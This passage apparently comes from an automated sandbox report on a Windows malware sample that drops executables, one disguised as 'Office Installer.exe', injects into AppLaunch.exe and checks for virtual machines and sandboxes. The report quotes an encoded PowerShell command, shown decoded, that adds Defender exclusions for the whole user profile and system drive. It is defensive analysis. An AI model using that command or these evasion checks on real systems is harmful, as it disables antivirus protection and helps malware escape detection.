Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL@\^Q
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EXPLORER9SBIEDLL.DLL:SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE;VERSION<SERIALNUMBER>VMWARE|VIRTUAL|A M I|XEN?SELECT * FROM WIN32_COMPUTERSYSTEM@MANUFACTURERAMODELBMICROSOFT|VMWARE|VIRTUALCJOHNDANNAEXXXXXXXX
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 3080000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 3250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 5250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 6500000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 7500000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 86B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: 96B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6770000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 68F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 88F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 14F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 2F40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 2E70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 60B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 70B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 8300000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 9300000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6E40000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 70E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6E40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 1A10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 37D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 1E00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 6970000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 7970000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 8B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Memory allocated: 9B30000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 5260000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 7030000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6E50000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4251
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 768
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Window / User API: threadDelayed 9995
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Window / User API: foregroundWindowGot 922
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Window / User API: foregroundWindowGot 856
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3219
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2823
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window / User API: threadDelayed 6176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window / User API: threadDelayed 3379
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe TID: 7324 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep count: 3219 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep count: 2823 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7836 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7892 Thread sleep count: 36 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7892 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7900 Thread sleep count: 6176 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7900 Thread sleep count: 3379 > 30
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe TID: 7964 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 8104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe TID: 8164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7428 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: Yara match File source: 4.0.Office Installer.exe.7ff6c80ea6da.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Gm602axA2d.exe.4ba1cfa.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Office Installer.exe.7ff6c80ea6da.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Office Installer.exe.7ff6c80ea6da.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.Office Installer.exe.7ff6c80ea6da.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.Office Installer.exe.7ff6c7e70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Office Installer.exe.7ff6c7e70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Gm602axA2d.exe PID: 7136, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Office Installer.exe PID: 7336, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Office Installer.exe, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware\V
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual@\^q
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: VMware, Inc.1>0<
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: explorer9SbieDll.dll:select * from Win32_BIOS8Unexpected WMI query failure;version<SerialNumber>VMware|VIRTUAL|A M I|Xen?select * from Win32_ComputerSystem@manufacturerAmodelBMicrosoft|VMWare|VirtualCjohnDannaExxxxxxxx
Source: Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareLR^qhf7
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: http://www.vmware.com/0
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GOA8B XBTW58A4OC@\^q0VMware|VIRTUAL|A M I|Xen
Source: AppLaunch.exe, 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&"
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: mwlhZ mnyYT9VTA cbCLrcnk@\^q0Microsoft|VMWare|Virtual
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareLR^q
Source: Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen@\^q
Source: powershell.exe, 00000008.00000002.2322745566.000002B46D71C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWareLR^q
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: VMware, Inc.0
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareLR^q$
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q 1:en-CH:Microsoft|VMWare|Virtual
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q 1:en-CH:VMware|VIRTUAL|A M I|Xen`
Source: Office Installer.exe, 00000004.00000002.2914496765.0000025350A18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q 1:en-CH:VMware|VIRTUAL|A M I|Xen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Gm602axA2d.exe Code function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit, 0_2_004014D1
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: Base64 decoded <#avz#>Add-MpPreference <#btd#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#jqq#> -Force <#zsj#>
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: Base64 decoded <#avz#>Add-MpPreference <#btd#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#jqq#> -Force <#zsj#>
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA="
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Vulvvmkewji.exe "C:\Users\user\AppData\Local\Vulvvmkewji.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Temp\Office Installer.exe "C:\Users\user\AppData\Local\Temp\Office Installer.exe"
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
